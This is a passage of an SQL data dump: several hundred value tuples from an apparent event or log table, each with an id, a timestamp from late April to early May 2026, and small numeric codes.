(29539, '2026-04-25 18:49:24', 1, 2062, 0, 1, 1),
(29540, '2026-04-25 19:22:19', 1, 2064, 0, 1, 1),
(29541, '2026-04-25 19:48:11', 1, 2059, 0, 1, 1),
(29542, '2026-04-25 20:36:43', 1, 2060, 0, 1, 1),
(29543, '2026-04-25 20:58:37', 4, 2062, 0, 1, 1),
(29544, '2026-04-25 21:24:26', 1, 2055, 0, 1, 1),
(29545, '2026-04-25 22:24:56', 1, 2064, 0, 1, 1),
(29546, '2026-04-25 23:02:32', 1, 2062, 0, 1, 1),
(29547, '2026-04-25 23:02:36', 1, 2063, 0, 1, 1),
(29548, '2026-04-25 23:02:40', 1, 2061, 0, 1, 1),
(29549, '2026-04-25 23:42:04', 1, 2058, 0, 1, 1),
(29550, '2026-04-26 05:18:22', 4, 2062, 0, 1, 1),
(29551, '2026-04-26 06:27:04', 1, 2054, 0, 1, 1),
(29552, '2026-04-26 07:17:47', 1, 2061, 0, 1, 1),
(29553, '2026-04-26 07:27:53', 1, 2064, 0, 1, 1),
(29554, '2026-04-26 07:39:02', 1, 2058, 0, 1, 1),
(29555, '2026-04-26 08:44:45', 1, 2061, 0, 1, 1),
(29556, '2026-04-26 11:47:13', 1, 2064, 0, 1, 1),
(29557, '2026-04-26 13:36:29', 4, 2062, 0, 1, 1),
(29558, '2026-04-26 14:18:13', 1, 2053, 0, 1, 1),
(29559, '2026-04-26 14:27:41', 4, 2059, 0, 1, 1),
(29560, '2026-04-26 14:50:09', 4, 2059, 0, 1, 1),
(29561, '2026-04-26 15:22:22', 1, 2060, 0, 1, 1),
(29562, '2026-04-26 18:25:55', 1, 2059, 0, 1, 1),
(29563, '2026-04-26 19:33:39', 1, 2055, 0, 1, 1),
(29564, '2026-04-26 19:50:30', 1, 2062, 0, 1, 1),
(29565, '2026-04-26 19:50:53', 1, 2062, 0, 1, 1),
(29566, '2026-04-26 21:19:11', 1, 2060, 0, 1, 1),
(29567, '2026-04-26 21:21:30', 1, 2054, 0, 1, 1),
(29568, '2026-04-26 21:28:40', 1, 2064, 0, 1, 1),
(29569, '2026-04-26 22:00:18', 4, 2062, 0, 1, 1),
(29570, '2026-04-27 01:38:10', 1, 2064, 0, 1, 1),
(29571, '2026-04-27 01:48:36', 1, 2063, 0, 1, 1),
(29572, '2026-04-27 03:21:04', 4, 2062, 0, 1, 1),
(29573, '2026-04-27 03:22:03', 4, 2054, 0, 1, 1),
(29574, '2026-04-27 03:22:25', 4, 2059, 0, 1, 1),
(29575, '2026-04-27 03:26:16', 1, 2058, 0, 1, 1),
(29576, '2026-04-27 03:28:24', 1, 2054, 0, 1, 1),
(29577, '2026-04-27 04:35:52', 1, 2061, 0, 1, 1),
(29578, '2026-04-27 04:36:00', 1, 2061, 0, 1, 1),
(29579, '2026-04-27 06:20:50', 4, 2062, 0, 1, 1),
(29580, '2026-04-27 08:47:29', 1, 2061, 0, 1, 1),
(29581, '2026-04-27 08:47:49', 1, 2064, 0, 1, 1),
(29582, '2026-04-27 08:56:45', 1, 2058, 0, 1, 1),
(29583, '2026-04-27 08:58:07', 1, 2059, 0, 1, 1),
(29584, '2026-04-27 08:59:40', 1, 2063, 0, 1, 1),
(29585, '2026-04-27 09:01:01', 1, 2060, 0, 1, 1),
(29586, '2026-04-27 09:02:37', 1, 2053, 0, 1, 1),
(29587, '2026-04-27 09:02:56', 1, 2055, 0, 1, 1),
(29588, '2026-04-27 09:06:41', 1, 2064, 0, 1, 1),
(29589, '2026-04-27 09:16:52', 1, 2062, 0, 1, 1),
(29590, '2026-04-27 09:56:02', 1, 2059, 0, 1, 1),
(29591, '2026-04-27 10:18:12', 1, 2054, 0, 1, 1),
(29592, '2026-04-27 12:35:43', 1, 2060, 0, 1, 1),
(29593, '2026-04-27 14:12:37', 1, 2062, 0, 1, 1),
(29594, '2026-04-27 14:16:01', 4, 2062, 0, 1, 1),
(29595, '2026-04-27 15:50:39', 1, 2062, 0, 1, 1),
(29596, '2026-04-27 18:21:20', 1, 2062, 0, 1, 1),
(29597, '2026-04-27 18:26:42', 1, 2062, 0, 1, 1),
(29598, '2026-04-27 18:42:11', 4, 2059, 0, 1, 1),
(29599, '2026-04-27 20:12:01', 1, 2061, 0, 1, 1),
(29600, '2026-04-27 20:41:16', 1, 2054, 0, 1, 1),
(29601, '2026-04-27 21:44:44', 4, 2062, 0, 1, 1),
(29602, '2026-04-27 22:25:47', 4, 2059, 0, 1, 1),
(29603, '2026-04-28 00:02:45', 1, 2060, 0, 1, 1),
(29604, '2026-04-28 00:02:53', 1, 2060, 0, 1, 1),
(29605, '2026-04-28 00:11:43', 1, 2064, 0, 1, 1),
(29606, '2026-04-28 00:11:59', 1, 2063, 0, 1, 1),
(29607, '2026-04-28 00:44:31', 4, 2059, 0, 1, 1),
(29608, '2026-04-28 01:28:06', 1, 2061, 0, 1, 1),
(29609, '2026-04-28 05:06:08', 4, 2062, 0, 1, 1),
(29610, '2026-04-28 05:13:45', 1, 2064, 0, 1, 1),
(29611, '2026-04-28 05:45:07', 1, 2063, 0, 1, 1),
(29612, '2026-04-28 06:16:30', 1, 2059, 0, 1, 1),
(29613, '2026-04-28 07:11:01', 1, 2060, 0, 1, 1),
(29614, '2026-04-28 07:21:07', 1, 2062, 0, 1, 1),
(29615, '2026-04-28 07:35:59', 1, 2058, 0, 1, 1),
(29616, '2026-04-28 08:34:45', 4, 2059, 0, 1, 1),
(29617, '2026-04-28 09:22:24', 1, 2058, 0, 1, 1),
(29618, '2026-04-28 09:45:15', 1, 2061, 0, 1, 1),
(29619, '2026-04-28 10:07:03', 1, 2058, 0, 1, 1),
(29620, '2026-04-28 10:30:44', 1, 2061, 0, 1, 1),
(29621, '2026-04-28 12:11:29', 1, 2054, 0, 1, 1),
(29622, '2026-04-28 12:31:11', 1, 2061, 0, 1, 1),
(29623, '2026-04-28 12:31:17', 1, 2060, 0, 1, 1),
(29624, '2026-04-28 12:47:27', 4, 2062, 0, 1, 1),
(29625, '2026-04-28 13:12:01', 1, 2055, 0, 1, 1),
(29626, '2026-04-28 13:29:11', 1, 2062, 0, 1, 1),
(29627, '2026-04-28 13:47:14', 1, 2063, 0, 1, 1),
(29628, '2026-04-28 14:07:13', 1, 2060, 0, 1, 1),
(29629, '2026-04-28 14:13:46', 1, 2060, 0, 1, 1),
(29630, '2026-04-28 14:22:10', 1, 2064, 0, 1, 1),
(29631, '2026-04-28 14:27:07', 1, 2055, 0, 1, 1),
(29632, '2026-04-28 14:47:18', 1, 2059, 0, 1, 1),
(29633, '2026-04-28 16:39:03', 1, 2060, 0, 1, 1),
(29634, '2026-04-28 16:39:07', 1, 2060, 0, 1, 1),
(29635, '2026-04-28 18:30:49', 1, 2062, 0, 1, 1),
(29636, '2026-04-28 18:31:15', 1, 2062, 0, 1, 1),
(29637, '2026-04-28 20:24:01', 4, 2062, 0, 1, 1),
(29638, '2026-04-28 21:50:41', 1, 2063, 0, 1, 1),
(29639, '2026-04-28 22:01:29', 1, 2061, 0, 1, 1),
(29640, '2026-04-28 22:21:24', 1, 2062, 0, 1, 1),
(29641, '2026-04-28 22:48:08', 1, 2063, 0, 1, 1),
(29642, '2026-04-28 22:55:08', 4, 2059, 0, 1, 1),
(29643, '2026-04-28 22:55:29', 1, 2060, 0, 1, 1),
(29644, '2026-04-29 03:34:19', 1, 2060, 0, 1, 1),
(29645, '2026-04-29 03:53:19', 4, 2062, 0, 1, 1),
(29646, '2026-04-29 04:06:18', 1, 2054, 0, 1, 1),
(29647, '2026-04-29 05:12:37', 4, 2059, 0, 1, 1),
(29648, '2026-04-29 07:45:25', 4, 2059, 0, 1, 1),
(29649, '2026-04-29 10:04:44', 1, 2064, 0, 1, 1),
(29650, '2026-04-29 10:05:21', 1, 2062, 0, 1, 1),
(29651, '2026-04-29 10:05:29', 1, 2061, 0, 1, 1),
(29652, '2026-04-29 10:05:45', 1, 2060, 0, 1, 1),
(29653, '2026-04-29 10:54:38', 1, 2053, 0, 1, 1),
(29654, '2026-04-29 10:54:49', 1, 2058, 0, 1, 1),
(29655, '2026-04-29 10:54:51', 1, 2059, 0, 1, 1),
(29656, '2026-04-29 10:55:48', 1, 2054, 0, 1, 1),
(29657, '2026-04-29 11:13:24', 1, 2061, 0, 1, 1),
(29658, '2026-04-29 11:27:50', 4, 2062, 0, 1, 1),
(29659, '2026-04-29 11:50:32', 1, 2062, 0, 1, 1),
(29660, '2026-04-29 14:13:27', 1, 2054, 0, 1, 1),
(29661, '2026-04-29 17:08:36', 1, 2063, 0, 1, 1),
(29662, '2026-04-29 18:26:35', 1, 2062, 0, 1, 1),
(29663, '2026-04-29 18:26:58', 1, 2062, 0, 1, 1),
(29664, '2026-04-29 19:05:17', 4, 2062, 0, 1, 1),
(29665, '2026-04-29 19:22:46', 1, 2054, 0, 1, 1),
(29666, '2026-04-29 19:52:25', 1, 2064, 0, 1, 1),
(29667, '2026-04-29 20:01:45', 1, 2058, 0, 1, 1),
(29668, '2026-04-29 20:32:18', 1, 2064, 0, 1, 1),
(29669, '2026-04-29 20:52:31', 1, 2060, 0, 1, 1),
(29670, '2026-04-29 21:32:25', 1, 2059, 0, 1, 1),
(29671, '2026-04-29 22:40:21', 1, 2053, 0, 1, 1),
(29672, '2026-04-29 23:20:56', 1, 2064, 0, 1, 1),
(29673, '2026-04-29 23:20:58', 1, 2061, 0, 1, 1),
(29674, '2026-04-29 23:21:00', 1, 2062, 0, 1, 1),
(29675, '2026-04-29 23:21:02', 1, 2059, 0, 1, 1),
(29676, '2026-04-29 23:21:09', 1, 2060, 0, 1, 1),
(29677, '2026-04-29 23:21:11', 1, 2063, 0, 1, 1),
(29678, '2026-04-29 23:21:13', 1, 2058, 0, 1, 1),
(29679, '2026-04-29 23:21:14', 1, 2054, 0, 1, 1),
(29680, '2026-04-29 23:21:17', 1, 2055, 0, 1, 1),
(29681, '2026-04-30 00:43:11', 1, 2055, 0, 1, 1),
(29682, '2026-04-30 01:22:03', 1, 2060, 0, 1, 1),
(29683, '2026-04-30 01:34:09', 1, 2055, 0, 1, 1),
(29684, '2026-04-30 02:26:02', 1, 2055, 0, 1, 1),
(29685, '2026-04-30 02:37:53', 4, 2062, 0, 1, 1),
(29686, '2026-04-30 02:42:36', 1, 2053, 0, 1, 1),
(29687, '2026-04-30 03:58:27', 1, 2060, 0, 1, 1),
(29688, '2026-04-30 04:10:50', 1, 2064, 9652, 1, 1),
(29689, '2026-04-30 04:57:59', 1, 2064, 0, 1, 1),
(29690, '2026-04-30 10:14:06', 4, 2062, 0, 1, 1),
(29691, '2026-04-30 10:42:26', 1, 2054, 0, 1, 1),
(29692, '2026-04-30 11:27:02', 1, 2062, 0, 1, 1),
(29693, '2026-04-30 13:00:53', 1, 2061, 0, 1, 1),
(29694, '2026-04-30 14:46:05', 1, 2058, 0, 1, 1),
(29695, '2026-04-30 14:59:27', 1, 2064, 0, 1, 1),
(29696, '2026-04-30 17:51:20', 1, 2053, 0, 1, 1),
(29697, '2026-04-30 17:55:24', 4, 2062, 0, 1, 1),
(29698, '2026-04-30 18:12:07', 1, 2062, 0, 1, 1),
(29699, '2026-04-30 18:12:37', 1, 2062, 0, 1, 1),
(29700, '2026-04-30 21:47:06', 1, 2063, 0, 1, 1),
(29701, '2026-04-30 22:06:03', 1, 2064, 9658, 1, 1),
(29702, '2026-04-30 22:56:25', 1, 2061, 0, 1, 1),
(29703, '2026-04-30 23:34:15', 1, 2062, 0, 1, 1),
(29704, '2026-04-30 23:45:28', 1, 2054, 0, 1, 1),
(29705, '2026-05-01 01:17:19', 4, 2062, 0, 1, 1),
(29706, '2026-05-01 01:34:50', 1, 2062, 0, 1, 1),
(29707, '2026-05-01 02:44:50', 1, 2061, 0, 1, 1),
(29708, '2026-05-01 03:41:27', 1, 2063, 0, 1, 1),
(29709, '2026-05-01 05:51:12', 1, 2061, 0, 1, 1),
(29710, '2026-05-01 08:16:31', 1, 2062, 0, 1, 1),
(29711, '2026-05-01 08:53:37', 4, 2062, 0, 1, 1),
(29712, '2026-05-01 09:05:10', 1, 2053, 0, 1, 1),
(29713, '2026-05-01 10:39:32', 4, 2059, 0, 1, 1),
(29714, '2026-05-01 10:40:00', 4, 2054, 0, 1, 1),
(29715, '2026-05-01 10:40:29', 4, 2062, 0, 1, 1),
(29716, '2026-05-01 11:49:03', 1, 2064, 0, 1, 1),
(29717, '2026-05-01 12:01:00', 1, 2055, 0, 1, 1),
(29718, '2026-05-01 16:20:45', 4, 2062, 0, 1, 1),
(29719, '2026-05-01 17:20:47', 1, 2064, 0, 1, 1),
(29720, '2026-05-01 17:59:44', 1, 2054, 0, 1, 1),
(29721, '2026-05-01 19:23:10', 1, 2053, 0, 1, 1),
(29722, '2026-05-01 19:40:19', 1, 2062, 0, 1, 1),
(29723, '2026-05-01 19:41:04', 1, 2062, 0, 1, 1),
(29724, '2026-05-01 19:55:09', 1, 2059, 0, 1, 1),
(29725, '2026-05-01 19:55:15', 1, 2062, 0, 1, 1),
(29726, '2026-05-01 22:02:46', 1, 2054, 0, 1, 1),
(29727, '2026-05-01 22:07:28', 1, 2058, 0, 1, 1),
(29728, '2026-05-01 22:38:21', 1, 2059, 0, 1, 1),
(29729, '2026-05-01 23:49:32', 4, 2062, 0, 1, 1),
(29730, '2026-05-02 00:05:45', 1, 2060, 0, 1, 1),
(29731, '2026-05-02 01:43:16', 1, 2059, 0, 1, 1),
(29732, '2026-05-02 02:11:59', 1, 2055, 0, 1, 1),
(29733, '2026-05-02 05:37:04', 1, 2062, 0, 1, 1),
(29734, '2026-05-02 05:40:08', 1, 2062, 0, 1, 1),
(29735, '2026-05-02 06:29:27', 1, 2063, 0, 1, 1),
(29736, '2026-05-02 07:07:20', 1, 2059, 0, 1, 1),
(29737, '2026-05-02 07:17:01', 4, 2062, 0, 1, 1),
(29738, '2026-05-02 08:47:13', 1, 2058, 0, 1, 1),
(29739, '2026-05-02 13:16:01', 1, 2064, 0, 1, 1),
(29740, '2026-05-02 15:17:22', 4, 2062, 0, 1, 1),
(29741, '2026-05-02 16:19:18', 1, 2064, 0, 1, 1),
(29742, '2026-05-02 18:02:08', 1, 2060, 0, 1, 1),
(29743, '2026-05-02 18:02:16', 1, 2060, 0, 1, 1),
(29744, '2026-05-02 18:04:19', 1, 2060, 0, 1, 1),
(29745, '2026-05-02 18:33:02', 1, 2062, 0, 1, 1),
(29746, '2026-05-02 18:43:28', 1, 2062, 0, 1, 1),
(29747, '2026-05-02 18:43:53', 1, 2062, 0, 1, 1),
(29748, '2026-05-02 18:44:38', 1, 2062, 0, 1, 1),
(29749, '2026-05-02 20:44:47', 1, 2060, 0, 1, 1),
(29750, '2026-05-02 20:44:50', 1, 2060, 0, 1, 1),
(29751, '2026-05-02 22:53:50', 1, 2064, 0, 1, 1),
(29752, '2026-05-02 23:12:02', 1, 2062, 0, 1, 1),
(29753, '2026-05-02 23:12:05', 1, 2063, 0, 1, 1),
(29754, '2026-05-02 23:12:09', 1, 2061, 0, 1, 1),
(29755, '2026-05-02 23:12:14', 4, 2062, 0, 1, 1),
(29756, '2026-05-02 23:40:38', 1, 2061, 0, 1, 1),
(29757, '2026-05-02 23:52:37', 1, 2061, 0, 1, 1),
(29758, '2026-05-03 02:21:15', 1, 2063, 0, 1, 1),
(29759, '2026-05-03 03:59:39', 1, 2064, 0, 1, 1),
(29760, '2026-05-03 03:59:40', 1, 2061, 0, 1, 1),
(29761, '2026-05-03 03:59:41', 1, 2064, 0, 1, 1),
(29762, '2026-05-03 03:59:49', 1, 2064, 0, 1, 1),
(29763, '2026-05-03 03:59:49', 1, 2061, 0, 1, 1),
(29764, '2026-05-03 03:59:49', 1, 2061, 0, 1, 1),
(29765, '2026-05-03 03:59:49', 1, 2061, 0, 1, 1),
(29766, '2026-05-03 03:59:49', 1, 2061, 0, 1, 1),
(29767, '2026-05-03 03:59:53', 1, 2063, 0, 1, 1),
(29768, '2026-05-03 03:59:54', 1, 2064, 0, 1, 1),
(29769, '2026-05-03 03:59:56', 1, 2055, 0, 1, 1),
(29770, '2026-05-03 03:59:59', 1, 2064, 0, 1, 1),
(29771, '2026-05-03 03:59:59', 1, 2064, 0, 1, 1),
(29772, '2026-05-03 03:59:59', 1, 2064, 0, 1, 1),
(29773, '2026-05-03 03:59:59', 1, 2064, 0, 1, 1),
(29774, '2026-05-03 03:59:59', 1, 2064, 0, 1, 1),
(29775, '2026-05-03 04:00:00', 1, 2059, 0, 1, 1),
(29776, '2026-05-03 04:00:00', 1, 2061, 0, 1, 1),
(29777, '2026-05-03 04:00:00', 1, 2061, 0, 1, 1),
(29778, '2026-05-03 04:00:00', 1, 2061, 0, 1, 1),
(29779, '2026-05-03 04:00:02', 1, 2058, 0, 1, 1),
(29780, '2026-05-03 04:00:02', 1, 2063, 0, 1, 1),
(29781, '2026-05-03 04:00:02', 1, 2063, 0, 1, 1),
(29782, '2026-05-03 04:00:03', 1, 2063, 0, 1, 1),
(29783, '2026-05-03 04:00:03', 1, 2063, 0, 1, 1),
(29784, '2026-05-03 04:00:03', 1, 2063, 0, 1, 1),
(29785, '2026-05-03 04:00:03', 1, 2063, 0, 1, 1),
(29786, '2026-05-03 04:00:04', 1, 2063, 0, 1, 1),
(29787, '2026-05-03 04:00:06', 1, 2062, 0, 1, 1),
(29788, '2026-05-03 04:00:06', 1, 2060, 0, 1, 1),
(29789, '2026-05-03 04:00:07', 1, 2063, 0, 1, 1),
(29790, '2026-05-03 04:00:09', 1, 2062, 0, 1, 1),
(29791, '2026-05-03 04:00:11', 1, 2060, 0, 1, 1),
(29792, '2026-05-03 04:00:12', 1, 2063, 0, 1, 1),
(29793, '2026-05-03 04:00:12', 1, 2063, 0, 1, 1),
(29794, '2026-05-03 04:00:14', 1, 2063, 0, 1, 1),
(29795, '2026-05-03 04:00:14', 1, 2063, 0, 1, 1),
(29796, '2026-05-03 04:00:14', 1, 2063, 0, 1, 1),
(29797, '2026-05-03 04:00:14', 1, 2063, 0, 1, 1),
(29798, '2026-05-03 04:00:14', 1, 2063, 0, 1, 1),
(29799, '2026-05-03 04:00:15', 1, 2054, 0, 1, 1),
(29800, '2026-05-03 04:00:17', 1, 2063, 0, 1, 1),
(29801, '2026-05-03 04:00:17', 1, 2063, 0, 1, 1),
(29802, '2026-05-03 04:00:20', 1, 2054, 0, 1, 1),
(29803, '2026-05-03 04:00:40', 1, 2054, 0, 1, 1),
(29804, '2026-05-03 04:00:40', 1, 2054, 0, 1, 1),
(29805, '2026-05-03 04:00:41', 1, 2054, 0, 1, 1),
(29806, '2026-05-03 04:00:41', 1, 2054, 0, 1, 1),
(29807, '2026-05-03 04:00:41', 1, 2054, 0, 1, 1),
(29808, '2026-05-03 04:00:41', 1, 2054, 0, 1, 1),
(29809, '2026-05-03 04:00:41', 1, 2054, 0, 1, 1),
(29810, '2026-05-03 04:00:41', 1, 2054, 0, 1, 1),
(29811, '2026-05-03 06:42:36', 4, 2062, 0, 1, 1),
(29812, '2026-05-03 07:09:39', 4, 2054, 0, 1, 1),
(29813, '2026-05-03 07:56:27', 1, 2054, 0, 1, 1),
(29814, '2026-05-03 08:28:59', 1, 2060, 0, 1, 1),
(29815, '2026-05-03 09:31:46', 1, 2055, 0, 1, 1),
(29816, '2026-05-03 10:06:45', 1, 2054, 0, 1, 1),
(29817, '2026-05-03 10:58:07', 1, 2064, 0, 1, 1),
(29818, '2026-05-03 11:47:35', 1, 2059, 0, 1, 1),
(29819, '2026-05-03 14:20:16', 4, 2062, 0, 1, 1),
(29820, '2026-05-03 15:44:18', 1, 2060, 0, 1, 1),
(29821, '2026-05-03 15:53:29', 1, 2054, 0, 1, 1),
(29822, '2026-05-03 17:57:34', 1, 2058, 0, 1, 1),
(29823, '2026-05-03 19:42:54', 1, 2064, 0, 1, 1),
(29824, '2026-05-03 21:53:10', 4, 2062, 0, 1, 1),
(29825, '2026-05-03 21:55:03', 1, 2058, 0, 1, 1),
(29826, '2026-05-03 22:44:34', 1, 2064, 0, 1, 1),
(29827, '2026-05-03 23:43:37', 1, 2064, 0, 1, 1),
(29828, '2026-05-04 01:01:26', 1, 2059, 0, 1, 1),
(29829, '2026-05-04 02:39:56', 1, 2061, 0, 1, 1),
(29830, '2026-05-04 03:45:13', 1, 2054, 0, 1, 1),
(29831, '2026-05-04 03:47:09', 1, 2054, 0, 1, 1),
(29832, '2026-05-04 05:21:25', 4, 2062, 0, 1, 1),
(29833, '2026-05-04 05:46:30', 1, 2062, 0, 1, 1),
(29834, '2026-05-04 06:15:53', 1, 2058, 0, 1, 1),
(29835, '2026-05-04 07:01:13', 1, 2062, 0, 1, 1),
(29836, '2026-05-04 09:13:39', 1, 2060, 0, 1, 1),
(29837, '2026-05-04 09:42:56', 1, 2062, 0, 1, 1),
(29838, '2026-05-04 09:58:35', 1, 2053, 0, 1, 1),
(29839, '2026-05-04 12:59:40', 4, 2062, 0, 1, 1),
(29840, '2026-05-04 13:02:01', 1, 2060, 0, 1, 1),
(29841, '2026-05-04 14:24:33', 1, 2055, 0, 1, 1),
(29842, '2026-05-04 15:09:44', 1, 2061, 0, 1, 1),
(29843, '2026-05-04 15:25:39', 1, 2059, 0, 1, 1),
(29844, '2026-05-04 16:47:35', 1, 2064, 0, 1, 1),
(29845, '2026-05-04 17:14:37', 1, 2053, 0, 1, 1),
(29846, '2026-05-04 19:40:50', 1, 2064, 0, 1, 1),
(29847, '2026-05-04 20:43:20', 4, 2062, 0, 1, 1),
(29848, '2026-05-04 21:47:43', 1, 2064, 0, 1, 1),
(29849, '2026-05-04 22:30:47', 1, 2053, 0, 1, 1),
(29850, '2026-05-04 22:31:12', 1, 2054, 0, 1, 1),
(29851, '2026-05-04 22:32:05', 1, 2055, 0, 1, 1),
(29852, '2026-05-04 22:32:59', 1, 2058, 0, 1, 1),
(29853, '2026-05-04 22:33:27', 1, 2061, 0, 1, 1),
(29854, '2026-05-04 22:33:52', 1, 2060, 0, 1, 1),
(29855, '2026-05-04 22:34:18', 1, 2062, 0, 1, 1),
(29856, '2026-05-04 22:34:45', 1, 2063, 0, 1, 1),
(29857, '2026-05-05 00:17:41', 1, 2053, 0, 1, 1),
(29858, '2026-05-05 00:45:30', 1, 2060, 0, 1, 1),
(29859, '2026-05-05 01:12:35', 1, 2054, 0, 1, 1),
(29860, '2026-05-05 03:33:25', 1, 2062, 0, 1, 1),
(29861, '2026-05-05 03:34:24', 1, 2062, 0, 1, 1),
(29862, '2026-05-05 03:38:32', 1, 2054, 0, 1, 1),
(29863, '2026-05-05 03:57:49', 1, 2061, 0, 1, 1),
(29864, '2026-05-05 04:06:53', 4, 2062, 0, 1, 1),
(29865, '2026-05-05 06:06:06', 1, 2058, 0, 1, 1),
(29866, '2026-05-05 07:00:32', 1, 2062, 0, 1, 1),
(29867, '2026-05-05 07:54:25', 1, 2055, 0, 1, 1),
(29868, '2026-05-05 08:33:32', 1, 2064, 0, 1, 1),
(29869, '2026-05-05 09:11:03', 1, 2063, 0, 1, 1),
(29870, '2026-05-05 09:11:14', 1, 2060, 0, 1, 1),
(29871, '2026-05-05 09:56:31', 1, 2060, 0, 1, 1),
(29872, '2026-05-05 10:25:24', 1, 2064, 0, 1, 1),
(29873, '2026-05-05 11:49:25', 4, 2062, 0, 1, 1),
(29874, '2026-05-05 12:15:22', 1, 2061, 0, 1, 1),
(29875, '2026-05-05 13:06:15', 1, 2060, 0, 1, 1),
(29876, '2026-05-05 13:46:04', 1, 2062, 0, 1, 1),
(29877, '2026-05-05 14:03:16', 1, 2060, 0, 1, 1),
(29878, '2026-05-05 14:03:19', 1, 2060, 0, 1, 1),
(29879, '2026-05-05 14:12:19', 1, 2060, 0, 1, 1),
(29880, '2026-05-05 14:13:31', 1, 2060, 0, 1, 1),
(29881, '2026-05-05 16:58:23', 1, 2064, 0, 1, 1),
(29882, '2026-05-05 17:51:09', 4, 2059, 0, 1, 1),
(29883, '2026-05-05 17:51:17', 4, 2062, 0, 1, 1),
(29884, '2026-05-05 17:51:47', 4, 2054, 0, 1, 1),
(29885, '2026-05-05 18:40:07', 1, 2062, 0, 1, 1),
(29886, '2026-05-05 18:40:57', 1, 2062, 0, 1, 1),
(29887, '2026-05-05 18:44:16', 1, 2060, 0, 1, 1),
(29888, '2026-05-05 19:38:27', 4, 2062, 0, 1, 1),
(29889, '2026-05-05 19:48:09', 1, 2063, 0, 1, 1),
(29890, '2026-05-05 19:57:37', 1, 2061, 0, 1, 1),
(29891, '2026-05-05 20:07:36', 1, 2061, 0, 1, 1),
(29892, '2026-05-05 20:16:12', 1, 2062, 0, 1, 1),
(29893, '2026-05-05 20:28:05', 1, 2060, 0, 1, 1),
(29894, '2026-05-05 20:31:40', 1, 2060, 0, 1, 1),
(29895, '2026-05-05 20:48:55', 1, 2063, 0, 1, 1),
(29896, '2026-05-05 20:55:23', 1, 2061, 0, 1, 1),
(29897, '2026-05-05 21:01:08', 1, 2064, 0, 1, 1),
(29898, '2026-05-06 00:03:47', 1, 2055, 0, 1, 1),
(29899, '2026-05-06 02:37:21', 1, 2064, 0, 1, 1),
(29900, '2026-05-06 03:15:30', 4, 2062, 0, 1, 1),
(29901, '2026-05-06 04:27:57', 1, 2058, 0, 1, 1),
(29902, '2026-05-06 05:32:27', 1, 2061, 0, 1, 1),
(29903, '2026-05-06 06:53:52', 1, 2054, 0, 1, 1),
(29904, '2026-05-06 07:24:19', 1, 2060, 0, 1, 1),
(29905, '2026-05-06 07:38:17', 1, 2061, 0, 1, 1),
(29906, '2026-05-06 11:00:35', 4, 2062, 0, 1, 1),
(29907, '2026-05-06 12:33:24', 1, 2060, 0, 1, 1),
(29908, '2026-05-06 12:37:03', 1, 2058, 0, 1, 1),
(29909, '2026-05-06 13:47:28', 1, 2053, 0, 1, 1),
(29910, '2026-05-06 17:18:24', 1, 2061, 0, 1, 1),
(29911, '2026-05-06 17:35:21', 1, 2064, 0, 1, 1),
(29912, '2026-05-06 17:47:20', 1, 2058, 0, 1, 1),
(29913, '2026-05-06 18:26:02', 1, 2062, 0, 1, 1),
(29914, '2026-05-06 18:26:29', 1, 2062, 0, 1, 1),
(29915, '2026-05-06 18:45:49', 4, 2062, 0, 1, 1),
(29916, '2026-05-06 19:22:51', 1, 2058, 0, 1, 1),
(29917, '2026-05-06 19:55:16', 1, 2061, 0, 1, 1),
(29918, '2026-05-06 22:12:48', 1, 2055, 0, 1, 1),
(29919, '2026-05-06 22:39:40', 1, 2053, 0, 1, 1),
(29920, '2026-05-06 23:31:47', 1, 2059, 0, 1, 1),
(29921, '2026-05-06 23:40:23', 1, 2055, 0, 1, 1),
(29922, '2026-05-06 23:54:22', 1, 2060, 0, 1, 1),
(29923, '2026-05-07 00:50:39', 1, 2054, 0, 1, 1),
(29924, '2026-05-07 01:20:45', 1, 2059, 0, 1, 1),
(29925, '2026-05-07 02:29:25', 4, 2062, 0, 1, 1),
(29926, '2026-05-07 03:05:14', 1, 2053, 0, 1, 1),
(29927, '2026-05-07 03:47:09', 1, 2061, 0, 1, 1),
(29928, '2026-05-07 04:41:20', 1, 2063, 0, 1, 1),
(29929, '2026-05-07 04:42:47', 1, 2064, 0, 1, 1),
(29930, '2026-05-07 05:03:48', 1, 2060, 0, 1, 1),
(29931, '2026-05-07 05:07:33', 1, 2064, 0, 1, 1),
(29932, '2026-05-07 06:35:29', 1, 2064, 0, 1, 1),
(29933, '2026-05-07 07:34:05', 1, 2059, 0, 1, 1),
(29934, '2026-05-07 08:36:24', 1, 2063, 0, 1, 1),
(29935, '2026-05-07 08:36:52', 1, 2063, 0, 1, 1),
(29936, '2026-05-07 09:46:57', 1, 2061, 0, 1, 1),
(29937, '2026-05-07 10:10:52', 4, 2062, 0, 1, 1),
(29938, '2026-05-07 10:23:28', 1, 2060, 0, 1, 1),
(29939, '2026-05-07 10:50:17', 1, 2060, 0, 1, 1),
(29940, '2026-05-07 12:17:27', 1, 2061, 0, 1, 1),
(29941, '2026-05-07 15:05:19', 1, 2054, 0, 1, 1),
(29942, '2026-05-07 18:04:44', 4, 2062, 0, 1, 1),
(29943, '2026-05-07 20:10:11', 1, 2061, 0, 1, 1),
(29944, '2026-05-07 21:32:47', 1, 2058, 0, 1, 1),
(29945, '2026-05-07 21:43:03', 1, 2060, 0, 1, 1),
(29946, '2026-05-07 21:43:06', 1, 2060, 0, 1, 1),
(29947, '2026-05-07 21:51:19', 1, 2063, 0, 1, 1),
(29948, '2026-05-07 21:56:09', 1, 2059, 0, 1, 1),
(29949, '2026-05-07 21:56:10', 1, 2061, 0, 1, 1),
(29950, '2026-05-07 21:56:11', 1, 2058, 0, 1, 1),
(29951, '2026-05-07 21:56:15', 1, 2055, 0, 1, 1),
(29952, '2026-05-07 21:56:15', 1, 2064, 0, 1, 1),
(29953, '2026-05-07 21:56:16', 1, 2059, 0, 1, 1),
(29954, '2026-05-07 21:56:18', 1, 2061, 0, 1, 1),
(29955, '2026-05-07 21:56:19', 1, 2058, 0, 1, 1),
(29956, '2026-05-07 21:56:21', 1, 2058, 0, 1, 1),
(29957, '2026-05-07 21:56:22', 1, 2059, 0, 1, 1),
(29958, '2026-05-07 21:56:23', 1, 2061, 0, 1, 1),
(29959, '2026-05-07 21:56:23', 1, 2064, 0, 1, 1),
(29960, '2026-05-07 21:56:23', 1, 2060, 0, 1, 1),
(29961, '2026-05-07 21:56:24', 1, 2062, 0, 1, 1),
(29962, '2026-05-07 21:56:24', 1, 2063, 0, 1, 1),
(29963, '2026-05-07 21:56:25', 1, 2064, 0, 1, 1),
(29964, '2026-05-07 21:56:25', 1, 2055, 0, 1, 1),
(29965, '2026-05-07 21:56:27', 1, 2064, 0, 1, 1),
(29966, '2026-05-07 21:56:30', 1, 2058, 0, 1, 1),
